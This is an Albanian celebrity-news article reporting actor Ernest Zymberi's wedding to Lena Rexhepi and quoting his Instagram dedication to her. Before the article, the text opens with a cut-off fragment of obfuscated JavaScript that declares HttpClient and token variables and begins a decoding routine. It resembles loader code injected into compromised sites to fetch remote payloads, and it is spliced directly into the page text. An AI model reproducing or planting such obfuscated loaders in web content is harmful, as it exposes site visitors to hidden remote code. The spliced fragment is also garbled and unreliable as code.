;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Martohet aktori i njohur i ‘O sa mirë’: Dedikimi për nusen s’duhet humbur

By

Aktori i njohur Ernest Zymberi ka sot një prej ditëve më të rëndësishme të jetës së tij.

Ai kurorëzon dashurinë me të dashurën e tij shumë vjeçare, Lena Rexhepin në një ceremoni relativisht të madhe me familjarë e miq.

E në prag të nisjes së eventit ka qenë vetë Zymberi që ka bërë një dedikim emocionues i cili nis nga takimi i parë i dyshes e deri tek ndjenjat e përziera të ditës së sotme.

Lexojeni më poshtë të plotë teksa çiftit i urojmë të trashëgohen! /Prive.al/

U zgjova herët në mëngjes i eksitum ashtu qysh është vetë dita e dasmës! Është dita qe jemi përgatite sot e sa kohë… Sot ne do të bëjmë premtimin tonë për t'u zotuar për njëri-tjetrin përgjithmonë. Gjate kohes qe po behesha gati , mu rikthyen plot kujtime te dashnis sone. Takimi i pare ( ne ora 17:10, Intro ) e gjithqka qe ka nise prej asaj dite per afer 4 vite lidhje e dashni…edhe sot e pyes veten se çfarë te mire kam bere per me te meritu ty ..M'u kujtuan kohet e veshtira dhe momentet qe nuk do ti perballoja vet dhe jam mirënjohës që ishe me mua dhe i perjetuam e i zgjidhem bashkë. Koha me ty ec shpejt dhe mire, me te dyten pajtona me shume ☺️ Mezi pres që të kaloj pjesën tjetër të jetës sime me ty..Nuk është se shkruaj shpesh diqka si kjo, sidomos gjate sa tash, por sot eshte krejt ndryshe. Keshtu qe duhet qe ta ruajme mire këtë shkrim sepse nuk mund t'premtoj shumë letra, por t'premtoj dashurinë, përkushtimin, besnikërinë dhe mbrojtjen time. Deri në frymën e fundit të jetës sime, unë do të të dua pa kushte. Unë do të mbroj dhe do të mbaj të sigurtë. Do te dua dhe te respektoj me shume se cdo skene e rreme e filmit dhe teatrit. Dashnia e jem nuk është e përsosun si unë, por kjo nuk do të më pengojë të përpiqem të jem i tillë në sytë e tu. Nëse dështoj gjatë rrugës, më kujto, më qorto, më duaj, derisa të kthehem në shqisat e mia. Ti dhe vetëm ti mund të më kthesh aty përsëri. Me dashni dhe lumtuni Bashkeshorti në tentativë ???♥️ Te dua . 02.09.2017 Photo by : @ersonzymberi

A post shared by Ernest Zymberi (@ernestzymberi) on

Artikuj të ngjashëm